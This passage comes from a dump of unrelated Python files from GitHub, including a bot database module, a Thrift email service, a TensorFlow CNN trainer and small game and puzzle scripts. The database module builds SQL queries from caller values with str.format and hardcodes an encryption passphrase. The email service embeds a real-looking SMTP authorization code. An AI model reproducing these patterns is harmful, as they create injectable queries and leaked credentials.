await cur.fetchall()\n seller_dict[row1 + row2] = []\n for seller_row in result_sellers:\n seller_row1 = seller_row0 = None\n if seller_row[1]:\n seller_row1 = seller_row[1].decode('utf8')\n if seller_row[0]:\n seller_row0 = seller_row[0].decode('utf8')\n seller_dict[row1 + row2].append([seller_row1, seller_row0])\n table4citypost = \"post4city_\" + str(row[0])\n await cur.execute(createtable4citypost.format(table4citypost = table4citypost))\n await conn.commit()\n await cur.execute(db2mem_citypost.format(table4citypost = table4citypost))\n await conn.commit()\n citypost_iter = await cur.fetchall()\n for citypost in citypost_iter:\n if citypost[0] and citypost[1]:\n citypost_0 = citypost[0].decode('utf8') \n citypost_1 = citypost[1].decode('utf8')\n if row[0] not in dict_citypost:\n dict_citypost[row[0]] = []\n dict_citypost[row[0]].append([citypost_0, citypost_1])\n table4customer = \"sec_customer_\" + str(row[0])\n await cur.execute(create_customer_table.format(table4customer = table4customer))\n await conn.commit()\n await cur.execute(select4customer.format(table4customer = table4customer))\n await conn.commit()\n iter4customer_chars = await cur.fetchall()\n for customer_chars in iter4customer_chars:\n if row[0] not in dic_user_id:\n dic_user_id[row[0]] = []\n dic_user_id[row[0]].append(customer_chars[0].decode('utf8'))\n for index in range(1, len(customer_chars)-1):\n if customer_chars[index]:\n list4customer_chars[index-1][customer_chars[0].decode('utf8') + row2] = customer_chars[index].decode('utf8')\n dict_token2e_num[row2] = row[0]\n else:\n return True\n\n elif flag_Update_Token == 2:\n for U_id in changeindb:\n Temp_Exchange_Token = save_new_token[U_id]\n Exchange_Token = (U_id, Temp_Exchange_Token[1])\n await cur.execute(Update_Token, Exchange_Token)\n await conn.commit()\n\n elif flag_Update_Token == 3:\n create_table_seller = \"sec_sell_\" + str(kwargs[\"table_name\"])\n temp_key = kwargs[\"key_acc\"]\n table_seller = (dic_first_button.get(temp_key),\n dic_secound_button.get(temp_key),\n dic_title.get(temp_key),\n dic_context.get(temp_key),\n dic_price_ware.get(temp_key),\n dic_currency_ware.get(temp_key),\n dic_unit_ware.get(temp_key),\n dic_discount.get(temp_key),\n dic_photo_file.get(temp_key),\n file_id.get(temp_key),\n day_code.get(temp_key))\n\n create_other_table = (\"CREATE TABLE IF NOT EXISTS \" + create_table_seller + \" (\"\n \"`emp_nu` int(12) NOT NULL AUTO_INCREMENT,\"\n \"`first_button` Text NULL,\"\n \"`secound_button` Text NULL,\"\n \"`title` Text NULL,\"\n \"`context` Text NULL,\"\n \"`price_ware` Text NULL,\"\n \"`currency_ware` Text NULL,\"\n \"`unit_ware` Text NULL,\"\n \"`discount` Text NULL,\"\n \"`photo_file` Text NULL,\"\n \"`file_id` Text NULL,\"\n \"`showindays` Text NULL,\"\n \"PRIMARY KEY(emp_nu));\")\n\n save_in_other_table = (\"SET block_encryption_mode = 'aes-256-cbc'; \"\n \"SET @key_str = SHA2('My secret passphrase',512);\"\n \"SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~'; \"\n \"INSERT IGNORE INTO \"+create_table_seller+\"(\"\n \"first_button, secound_button, title, context, currency_ware, price_ware, unit_ware, discount, photo_file, file_id, showindays)\"\n \"VALUES(AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector));\")\n\n await cur.execute(create_other_table)\n await conn.commit()\n await cur.execute(save_in_other_table, table_seller)\n await conn.commit()\n\n elif flag_Update_Token == \"chang_token\":\n await cur.execute(update_token.format(Bot_id = kwargs[\"bot_id\"], Token = kwargs[\"new_token\"]))\n await conn.commit()\n\n elif flag_Update_Token == \"give_bot_id4ch_t\":\n give_bot_id = \"\"\"SET @ENCRYPT_User_id = '{User_id}'; \n select AES_DECRYPT(Bot_ID,@key_str, @init_vector) from Token_Takjoy where @ENCRYPT_User_id = AES_DECRYPT(User_id, @key_str, @init_vector);\"\"\"\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(give_bot_id.format(User_id = str(kwargs[\"user_id\"])))\n await conn.commit()\n result_bot_names = await cur.fetchall()\n return result_bot_names\n\n elif flag_Update_Token == \"charge_bot\":\n charge_bot_table = \"\"\"SET @ENCRYPT_Bot_id = '{Bot_id}';\n UPDATE Token_Takjoy SET `Bot_Date` = DATE_ADD(`Bot_Date` , INTERVAL {Daysetting} DAY)\n where Bot_id = AES_ENCRYPT(@ENCRYPT_Bot_id,@key_str, @init_vector)\"\"\"\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(charge_bot_table.format(Bot_id = kwargs[\"bot_id\"], Daysetting = str(kwargs[\"day\"])))\n await conn.commit()\n return\n\n elif flag_Update_Token == \"create_db4citypost\":\n table4citypost = \"post4city_\" + str(kwargs[\"table_name\"])\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4citypost}(\n `citypost_no` int(12) NOT NULL AUTO_INCREMENT,\n `city_name` Text not NULL,\n `post_purchase` Text not NULL,\n PRIMARY KEY(citypost_no));\"\"\")\n save_in_citypost = (\"\"\"INSERT IGNORE INTO {table4citypost}(city_name, post_purchase)\n VALUES(AES_ENCRYPT('{city_name}',@key_str, @init_vector),\n AES_ENCRYPT('{post_purchase}',@key_str, @init_vector));\"\"\")\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(createtable4citypost.format(table4citypost = table4citypost))\n await conn.commit()\n await cur.execute(save_in_citypost.format(table4citypost = table4citypost, city_name = kwargs[\"city_name\"], post_purchase = kwargs[\"post_purchase\"]))\n await conn.commit()\n\n elif flag_Update_Token == \"db4citypost\":\n table4citypost = \"post4city_\" + str(kwargs[\"table_name\"])\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4citypost}(\n `citypost_no` int(12) NOT NULL AUTO_INCREMENT,\n `city_name` Text not NULL,\n `post_purchase` Text not NULL,\n PRIMARY KEY(citypost_no));\"\"\")\n take_from_citypost = (\"\"\"select AES_DECRYPT(city_name,@key_str, @init_vector),\n AES_DECRYPT(post_purchase,@key_str, @init_vector)\n from {table4citypost};\"\"\")\n edit_citypost = (\"\"\"update {table4citypost} set `city_name` = AES_ENCRYPT('{city_name}',@key_str, @init_vector),\n `post_purchase` = AES_ENCRYPT('{city_name}',@key_str, @init_vector) where\n `city_name` = AES_ENCRYPT('{ex_city_name}',@key_str, @init_vector);\"\"\")\n delete_citypost = (\"\"\"DELETE FROM {table4citypost} where `city_name` = AES_ENCRYPT('{city_name}',@key_str, @init_vector);\"\"\")\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(createtable4citypost.format(table4citypost = table4citypost))\n await conn.commit() \n if kwargs['ctrl_account'] == \"take_from_citypost\":\n await cur.execute(take_from_citypost.format(table4citypost = table4citypost))\n await conn.commit()\n result_sellers = await cur.fetchall()\n return result_sellers \n elif kwargs['ctrl_account'] == \"edit_citypost\":\n await cur.execute(edit_citypost.format(table4citypost = table4citypost, city_name = kwargs[\"city_name\"], post_purchase = kwargs[\"purchaseofcity\"], ex_city_name = kwargs[\"ex_city_name\"]))\n await conn.commit()\n elif kwargs['ctrl_account'] == \"delete_citypost\":\n await cur.execute(delete_citypost.format(table4citypost = table4citypost, city_name = kwargs[\"city_name\"]))\n await conn.commit() \n\n elif flag_Update_Token ==\"account_db\":\n table4account = \"account_\" + str(kwargs[\"table_num\"])\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4account}(\n `account_no` int(12) NOT NULL AUTO_INCREMENT,\n `account_num` Text not NULL,\n `account_name` Text not NULL,\n PRIMARY KEY(account_no));\"\"\")\n save_in_citypost = (\"\"\"INSERT IGNORE INTO {table4account}(account_num, account_name)\n VALUES(AES_ENCRYPT('{account_num}',@key_str, @init_vector),\n AES_ENCRYPT('{account_name}',@key_str, @init_vector));\"\"\")\n take_from_db = (\"\"\"select AES_DECRYPT(`account_num`,@key_str, @init_vector) from {table4account};\"\"\")\n take_all_from_db = (\"\"\"select AES_DECRYPT(`account_num`,@key_str, @init_vector), AES_DECRYPT(`account_name`,@key_str, @init_vector) from {table4account};\"\"\")\n Delete_from_db = (\"\"\"Delete from {table4account} where '{account_num}' = AES_DECRYPT(`account_num`,@key_str, @init_vector);\"\"\")\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(createtable4citypost.format(table4account = table4account))\n await conn.commit()\n result_db = await cur.fetchall()\n if kwargs['ctrl_account'] == \"save_in_db\":\n await cur.execute(save_in_citypost.format(table4account = table4account, account_num = kwargs[\"account_num\"], account_name = kwargs[\"account_name\"]))\n await conn.commit()\n elif kwargs['ctrl_account'] == \"take_from_db\":\n await cur.execute(take_from_db.format(table4account = table4account))\n await conn.commit()\n result_account = await cur.fetchall()\n Temp_account = []\n for accounts in result_account:\n Temp_account.append(accounts[0].decode('utf8'))\n return Temp_account\n elif kwargs['ctrl_account'] == \"Delete_from_db\":\n await cur.execute(Delete_from_db.format(table4account = table4account, account_num = kwargs[\"account_num\"]))\n await conn.commit()\n elif kwargs['ctrl_account'] == \"take_all_from_db\":\n await cur.execute(take_all_from_db.format(table4account = table4account))\n await conn.commit()\n result_all_account = await cur.fetchall()\n return result_all_account\n await cur.close()\n conn.close()\n","repo_name":"m2khosravizadeh/Ex_Takjoybot","sub_path":"first/db_takjoy.py","file_name":"db_takjoy.py","file_ext":"py","file_size_in_byte":19509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"24877854377","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append(\"/\")\nfrom message.api import MessageService\nfrom thrift.transport import TSocket\nfrom thrift.transport import TTransport\nfrom thrift.protocol import TBinaryProtocol\nfrom thrift.server import TServer\n\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\n#发送email的邮箱和授权码\nsender = \"15604288825@163.com\"\nauthCode = \"xj199804025511hl\"\nclass MessageServiceHandler:\n def sendMobileMessage(self, mobile, message):\n print(\"sendMobileMessage,mobile:\"+mobile+\",message:\"+message)\n return True\n\n def sendEmailMessage(self, email, message):\n print(\"sendEmailMessage,Email:\" + email + \",message:\" + message)\n #create text\n messageObj = MIMEText(message,\"plain\",\"utf-8\")\n messageObj['From'] = sender\n messageObj['To'] = email\n messageObj['Subject'] = Header(\"徐俊的邮件\",\"utf-8\")\n\n try:\n smtpObj = smtplib.SMTP('smtp.163.com')\n smtpObj.login(sender,authCode)\n #send email\n smtpObj.sendmail(sender,email,messageObj.as_string())\n except smtplib.SMTPException as ex:\n print(\"send email filed ...\")\n print(ex)\n return False\n\n print(\"send email success ...\")\n return True\n\nif __name__ == '__main__':\n handler = MessageServiceHandler()\n processor = MessageService.Processor(handler)\n transport = TSocket.TServerSocket(None, \"9090\")\n tfactory = TTransport.TFramedTransportFactory()\n pfactory = TBinaryProtocol.TBinaryProtocolFactory()\n\n server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)\n print (\"python thrift server start\")\n server.serve()\n print (\"python thrift server exit\")\n","repo_name":"xvjun/microservice","sub_path":"message-thrift-python-service/message/message_service.py","file_name":"message_service.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"72188258887","text":"\"\"\"\n @author: Austin Edwards\n\n View for displaying, adding, and removing ImageManagerFileTable data\n\n\"\"\"\n\nfrom PyQt5.QtWidgets import QMainWindow, QTableWidget, QHeaderView\n\nfrom views.image_manager_view_ui import Ui_ImageManagerMainWindow\nfrom controllers.image_manager_ctrl import ImageManagerController\nimport numpy as np\nimport pandas as pd\n\nclass ImageManagerView(QMainWindow):\n def __init__(self, model, main_controller):\n \n super().__init__()\n\n self._model = model\n self._main_controller = main_controller\n\n self._ui = Ui_ImageManagerMainWindow()\n self._ui.setupUi(self)\n self._ui.addImageButton.clicked.connect(self._main_controller.request_image_files)\n self._ui.removeImageButton.clicked.connect(self.remove_images)\n\n self._ui.imageManagerTableView.setSelectionBehavior(QTableWidget.SelectRows)\n self._ui.imageManagerTableView.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n \n self._ui.imageManagerTableView.setModel(self._model)\n\n def remove_images(self):\n \"\"\" Sends selected indexes to delete to file table model \"\"\"\n print(\"REMOVE\")\n self._model.delete_row(self._ui.imageManagerTableView.selectedIndexes())\n\n def closeEvent(self, event):\n \"\"\" Lets the controller know that the window has been closed so that the current image can be updated \"\"\"\n \n event.accept()\n \n if len(self._model._filelist) > 0:\n self._main_controller.file_manager_window_close()\n","repo_name":"awedwards/multiview-image-data-explorer","sub_path":"views/image_manager_view.py","file_name":"image_manager_view.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"30243575858","text":"from sys import stdin\n\ndef y(n):\n result = []\n for i in range(1, n+1):\n if n%i == 0:\n result.append(i)\n return result\n\ndef x(nlist: list, v:int):\n result = \"\"\n for i in nlist[:-1]:\n for j in nlist[1:]:\n if i+j == v:\n result = \"yes\"\n return result\n result = \"no\"\n return result\n\n\nT = int(input())\nfor i in range(T):\n A, B = map(int, stdin.readline().split())\n tmp = y(A)\n print(x(tmp, B))\n continue","repo_name":"taza0912/daily_coding","sub_path":"BOJ(Baekjoon_Online_Judge)/baekjoon_1402.py","file_name":"baekjoon_1402.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42694284079","text":"#!/usr/bin/env python3\nimport click\nimport soco\n\n@click.command()\n@click.argument(\"sonos_ip\")\n@click.argument(\"stream_url\")\ndef cli(sonos_ip, stream_url):\n \"\"\"Plays the given STREAM_URL on the SONOS_IP device\"\"\"\n speaker = soco.SoCo(sonos_ip)\n speaker.clear_queue()\n speaker.add_uri_to_queue(stream_url)\n speaker.play_from_queue(0)\n\ndef main():\n cli(prog_name=\"sonos-play\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"denysvitali/sonos-live-stream","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"20764290424","text":"import scipy.io as sio\nimport numpy as np\nimport tensorflow as tf\nimport random\nfrom sklearn.preprocessing import *\nfrom time import *\nimport os\nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom sklearn.preprocessing import MinMaxScaler\nfrom PIL import Image\n\n###下面是讲解python怎么读取.mat文件以及怎么处理得到的结果###\nload_fn = 'F:/zhicheng/张森师兄训练数据/ToZZC/feature_10.mat'\nprint(load_fn)\nload_data = sio.loadmat(load_fn)\n# load_matrix = load_data['matrix']\n# 假设文件中存有字符变量是matrix,例如matlab中save(load_fn, 'matrix');\n# 当然可以保存多个save(load_fn, 'matrix_x', 'matrix_y', ...);\n# load_matrix_row = load_matrix[0]\n# 取了当时matlab中matrix的第一行,python中数组行排\n# print(np.split(load_data['feature.P']))\na = load_data['feature'][0]\na = a[0]\ntemp = a[1]\nyj = a[2]\nyj = yj[0]\n\nfwj = a[3]\nfwj = fwj[0]\n# print(\"方位角:\", fwj)\n\ninput_data = np.transpose(temp) # 整理输入\n# print(\"input_data\", input_data)\n# print(\"仰角\", yj)\n\ntrain_data = []\ntest_data = []\nfwjtrainlabel = []\nfwjtestlabel = []\nyjtrainlabel = []\nyjtestlabel = []\ntest_accuracy_list=[]\nCKPT_DIR = 'C:/Users/Administrator/Desktop/owndatatest1/'\n\nfilename = 'C:/Users/Administrator/Desktop/owndatatest2/'\nfilename2 = 'C:/Users/Administrator/Desktop/owndatatest3/'\nfor pic in os.listdir(filename):\n im = Image.open(filename + pic)\n im2 = np.array(im)\n train_data.append(im2)\ntrain_data = np.array(train_data)\n\n\nfor pic in os.listdir(filename2):\n im = Image.open(filename + pic)\n im2 = np.array(im)\n test_data.append(im2)\ntest_data = np.array(test_data)\n\nfor i in range(0, 3360):\n yjtrainlabel.append(yj[i])\nfor i in range(3360, 3840):\n yjtestlabel.append(yj[i]) # 整理标签\n\n\ndata1 = np.array(yjtrainlabel)\nvalues1 = data1\nlabel_encoder1 = LabelEncoder()\ninteger_encoded1 = label_encoder1.fit_transform(values1)\n# print(integer_encoded)\n\nonehot_encoder1 = OneHotEncoder(sparse=False)\ninteger_encoded1 = integer_encoded1.reshape(len(integer_encoded1), 1)\nonehot_encoded1 = onehot_encoder1.fit_transform(integer_encoded1)\nYtrain_onehot = np.array(onehot_encoded1)\n\nprint(\"Ytrain_onehot-----------------\", Ytrain_onehot)\n\n\ndata2 = yjtestlabel\nvalues2 = np.array(data2)\n# print(values)\n\nlabel_encoder2 = LabelEncoder()\ninteger_encoded2 = label_encoder2.fit_transform(values2)\n# print(integer_encoded)\n\nonehot_encoder2 = OneHotEncoder(sparse=False)\ninteger_encoded2 = integer_encoded2.reshape(len(integer_encoded2), 1)\nonehot_encoded2 = onehot_encoder2.fit_transform(integer_encoded2)\nprint(\"onehot_encoded2----------------\", onehot_encoded2)\n\n\n# 初始化过滤器\ndef weight_variable(shape):\n return tf.Variable(tf.truncated_normal(shape, stddev=0.1))\n\n\n# 初始化偏置,初始化时,所有值是0.1\ndef bias_variable(shape):\n return tf.Variable(tf.constant(0.1, shape=shape))\n\n\n# 卷积运算,strides表示每一维度滑动的步长,一般strides[0]=strides[3]=1\n# 第四个参数可选\"Same\"或\"VALID\",“Same”表示边距使用全0填充\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding=\"SAME\")\n\n\n# 池化运算\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n\n\n# 创建x占位符,用于临时存放MNIST图片的数据,\n# [None, 784]中的None表示不限长度,而784则是一张图片的大小(28×28=784)\nx = tf.placeholder(tf.float32, [None, 28, 28])\n# y_存的是实际图像的标签,即对应于每张输入图片实际的值\ny_ = tf.placeholder(tf.float32, [None, 8])\n\n# 将图片从784维向量重新还原为28×28的矩阵图片,\n# 原因参考卷积神经网络模型图,最后一个参数代表深度,\n# 因为MNIST是黑白图片,所以深度为1,\n# 第一个参数为-1,表示一维的长度不限定,这样就可以灵活设置每个batch的训练的个数了\nx_image = tf.reshape(x, [-1, 28, 28, 1])\n\n# 第一层卷积\n# 将过滤器设置成5×5×1的矩阵,\n# 其中5×5表示过滤器大小,1表示深度,因为MNIST是黑白图片只有一层。所以深度为1\n# 32表示卷积在经过每个5×5大小的过滤器后可以算出32个特征,即经过卷积运算后,输出深度为32\nW_conv1 = weight_variable([5, 5, 1, 32])\n# 有多少个输出通道数量就有多少个偏置\nb_conv1 = bias_variable([32])\n# 使用conv2d函数进行卷积计算,然后再用ReLU作为激活函数\nh_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\n\nW_conv3 = weight_variable([5, 5, 32, 32])\n# 有多少个输出通道数量就有多少个偏置\nb_conv3 = bias_variable([32])\n# 使用conv2d函数进行卷积计算,然后再用ReLU作为激活函数\nh_conv3 = tf.nn.relu(conv2d(h_conv1, W_conv3) + b_conv3)\n\nW_conv5 = weight_variable([5, 5, 32, 32])\n# 有多少个输出通道数量就有多少个偏置\nb_conv5 = bias_variable([32])\n# 使用conv2d函数进行卷积计算,然后再用ReLU作为激活函数\nh_conv5 = tf.nn.relu(conv2d(h_conv3, W_conv5) + b_conv5)\n\n\nh_pool1=max_pool_2x2(h_conv5)\n# 卷积以后再经过池化操作\n#h_pool1 = max_pool_2x2(h_conv1)\n\n\n\n\n\n# 第二层卷积\n# 因为经过第一层卷积运算后,输出的深度为32,所以过滤器深度和下一层输出深度也做出改变\nW_conv2 = weight_variable([5, 5, 32, 64])\nb_conv2 = bias_variable([64])\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n\nW_conv4 = weight_variable([5, 5, 64, 64])\nb_conv4 = bias_variable([64])\nh_conv4 = tf.nn.relu(conv2d(h_conv2, W_conv4) + b_conv4)\n\nh_pool2 = max_pool_2x2(h_conv4)\n\n# 全连接层\n# 经过两层卷积后,图片的大小为7×7(第一层池化后输出为(28/2)×(28/2),\n# 第二层池化后输出为(14/2)×(14/2)),深度为64,\n# 我们在这里加入一个有1024个神经元的全连接层,所以权重W的尺寸为[7 * 7 * 64, 1024]\nW_fc1 = weight_variable([7 * 7 * 64, 1024])\n# 偏置的个数和权重的个数一致\nb_fc1 = bias_variable([1024])\n# 这里将第二层池化后的张量(长:7 宽:7 深度:64) 变成向量(跟上一节的Softmax模型的输入一样了)\nh_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64])\n# 使用ReLU激活函数\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n# dropout\n# 为了减少过拟合,我们在输出层之前加入dropout\nkeep_prob = tf.placeholder(tf.float32)\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n# 输出层\n# 全连接层输入的大小为1024,而我们要得到的结果的大小是10(0~9),\n# 所以这里权重W的尺寸为[1024, 10]\nW_fc2 = weight_variable([1024, 8])\nb_fc2 = bias_variable([8])\n# 最后都要经过Softmax函数将输出转化为概率问题\ny_conv = tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\n# 损失函数和损失优化\n#cross_entropy = tf.reduce_sum(y_ * tf.log(y_conv))\n# coss_entropy=tf.losses.sparse_softmax_cross_entropy(labels=y_,logits=y_conv)\ncross_entropy = tf.reduce_mean (\n tf.nn.softmax_cross_entropy_with_logits (labels = y_, logits = y_conv))#损失函数,交叉熵方法\n# train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\ntrain_step= tf.train.GradientDescentOptimizer(0.001).minimize(cross_entropy)\n\n# 测试准确率,跟Softmax回归模型的一样\ncorrect_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\n# 开始训练\nwith tf.Session() as sess:\n # 初始化所有变量\n sess.run(tf.global_variables_initializer())\n saver=tf.train.Saver(max_to_keep=3)\n # 训练两万次\n for i in range(20000):\n # # 每次获取50张图片数据和对应的标签\n # batch1 = train_data.next_batch(50)\n # batch2=test_data.next_batch(50)\n # # 每训练100次,我们打印一次训练的准确\n train_accuracy = sess.run(accuracy, feed_dict={x: train_data, y_: Ytrain_onehot, keep_prob: 0.5})\n print(\"step %d, training accuracy %g\" % (i, train_accuracy))\n sess.run(train_step, feed_dict={x: train_data, y_: Ytrain_onehot, keep_prob: 0.5})# 这里是真的训练,将数据传入\n #train_step.run(feed_dict={x: train_data, y_: Ytrain_onehot, keep_prob: 0.5})\n test_accuracy = sess.run(accuracy, feed_dict={x: test_data, y_: onehot_encoded2, keep_prob: 1.0})\n test_accuracy_list.append(test_accuracy)\n if i%5000 == 0:\n saver.save(sess, CKPT_DIR+'model.ckpt',global_step=i)\n if i % 100 == 0:\n print(test_accuracy)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"kdzhangzhicheng/cnntrainowndata","sub_path":"cnnyj.py","file_name":"cnnyj.py","file_ext":"py","file_size_in_byte":8532,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"73588458889","text":"from constants import *\r\nfrom board_and_rules import Board, GameRules, PlayGame\r\nfrom mcts import Node, MCTS\r\n\r\nclass PlayVsAI(PlayGame, MCTS):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def play_vs_mcts(self, num_iters, num_sims=1, hide_evaluations=True):\r\n while self.is_terminal(self.game) == \"-\":\r\n move = self.input_move(\"x\")\r\n self.make_move_(self.game, move)\r\n self.print_board()\r\n\r\n if self.is_terminal(self.game) != \"-\":\r\n break\r\n\r\n move = self.search(self.game, move, num_iters, num_sims, hide_evaluations=hide_evaluations)\r\n print(move_keys_inv[move[0]])\r\n self.make_move_(self.game, move)\r\n self.print_board()\r\n print(self.is_terminal(self.game), \"wins!\")\r\n\r\nif __name__ == '__main__':\r\n run = PlayVsAI()\r\n run.play_vs_mcts(10000)\r\n ","repo_name":"BevandaIvan/uttt-mcts","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"128197331","text":"# Solved on 2021.01.04\n# 2667 단지번호붙이기 ver.BFS\n\n# ---------------------------\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\n\ndef bfs(board, x, y, visited):\n global count\n\n queue = deque()\n queue.append((x, y))\n\n visited[x][y] = True\n count += 1\n\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n\n while queue:\n a, b = queue.popleft()\n for i in range(4):\n nx = a + dx[i]\n ny = b + dy[i]\n\n if nx < 0 or ny < 0 or nx >= n or ny >= n:\n continue\n elif not visited[nx][ny] and board[nx][ny] == 1:\n queue.append((nx, ny))\n visited[nx][ny] = True\n count += 1\n\n\nn = int(input())\nboard = []\nvisited = [[False] * n for _ in range(n)]\ncount = 0\nnum = 0\nc = []\n\n\nfor _ in range(n):\n board.append(list(map(int, input().rstrip())))\n\nfor i in range(n):\n for j in range(n):\n if board[i][j] == 1 and not visited[i][j]:\n bfs(board, i, j, visited)\n c.append(count)\n count = 0\n num += 1\n\nprint(num)\nc.sort()\nfor i in c:\n print(i)\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/DFS_and_BFS/2667_2.py","file_name":"2667_2.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9829919055","text":"import pygame\nfrom pygame.locals import DOUBLEBUF, QUIT, KEYUP, K_ESCAPE\nimport sys\n\npygame.init()\n\n# 디스플레이 초기화\nDISPLAYSURF = pygame.display.set_mode((640, 480), DOUBLEBUF)\npygame.display.set_caption(\"등축 투영\")\n\n\n# 맵 데이터: (1) 벽, (0) 바닥\nmap_data = [\n [1, 1, 1, 1, 1],\n [1, 0, 0, 0, 1],\n [1, 0, 0, 0, 1],\n [1, 0, 0, 0, 1],\n [1, 0, 0, 0, 1],\n [1, 1, 0, 0, 1],\n [1, 1, 0, 0, 1],\n [1, 1, 1, 1, 1],\n]\n\n# 타일 이미지 로드\nwall = pygame.image.load(\"map_tset01.png\").convert_alpha()\ngrass = pygame.image.load(\"map_test02.png\").convert_alpha()\nTILEWIDTH = 64 # 타일 너비\nTILEHEIGHT = 64 # 타일 높이\nTILEHEIGHT_HALF = TILEHEIGHT / 2\nTILEWIDTH_HALF = TILEWIDTH / 2\n\n# 타일 배치\nfor row_nb, row in enumerate(map_data):\n for col_nb, tile in enumerate(row):\n if tile == 1:\n tileImage = wall\n else:\n tileImage = grass\n cart_x = row_nb * TILEWIDTH_HALF\n cart_y = col_nb * TILEHEIGHT_HALF\n iso_x = cart_x - cart_y\n iso_y = (cart_x + cart_y) / 2\n centered_x = DISPLAYSURF.get_rect().centerx + iso_x\n centered_y = DISPLAYSURF.get_rect().centery / 2 + iso_y\n DISPLAYSURF.blit(tileImage, (centered_x, centered_y))\n\n# 게임 실행\nFPSCLOCK = pygame.time.Clock()\nwhile True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYUP:\n if event.key == K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n pygame.display.flip()\n FPSCLOCK.tick(30)","repo_name":"kywon22/2DGP-project_2021184019","sub_path":"dummy/past/map_state.py","file_name":"map_state.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"12662499811","text":"import pandas as pd\nimport numpy as np\nfrom portfolio import *\nfrom get_data import *\nfrom utils import *\nimport copy\n#from matplotlib import pyplot as plt\n#import seaborn\n\n#housekeeping\nconfig = Config()\ntransaction_fee = config.get_generic_config_property('portfolio','transaction_fee')\nmax_holdings = config.get_generic_config_property('portfolio','max_holdings')\n\n#beginning = datetime.datetime.strptime(config.get_generic_config_property('stocks','start_date'), '%Y-%m-%d').date()\n#finish = datetime.datetime.strptime(config.get_generic_config_property('stocks','end_date'), '%Y-%m-%d').date()\n\nportfolio = Portfolio()\nraw_market_data = GetStocks()\nraw_market_data = raw_market_data.stock_data.dropna()\n\n#time window has to reflect number of trading days, should be number of rows in the raw market data - 1\ntime_window = raw_market_data.shape[0] - 1 #114 #(finish - beginning).days - 5 #days\ntoday = raw_market_data.iloc[2].name.strftime('%Y-%m-%d')\n\n\n\ndef assess_buy_and_hold(portfolio_dict: dict(), raw_market_data: pd.DataFrame()) -> dict():\n buy_and_hold_keys = list(portfolio_dict.keys())\n buy_and_hold_keys.remove('cash')\n final_close = raw_market_data.Close[buy_and_hold_keys].iloc[-1].to_dict()\n portfolio_dict_buy_and_hold_final = portfolio_dict.copy()\n for k, v in portfolio_dict_buy_and_hold_final.items():\n if k == 'cash':\n pass\n else:\n 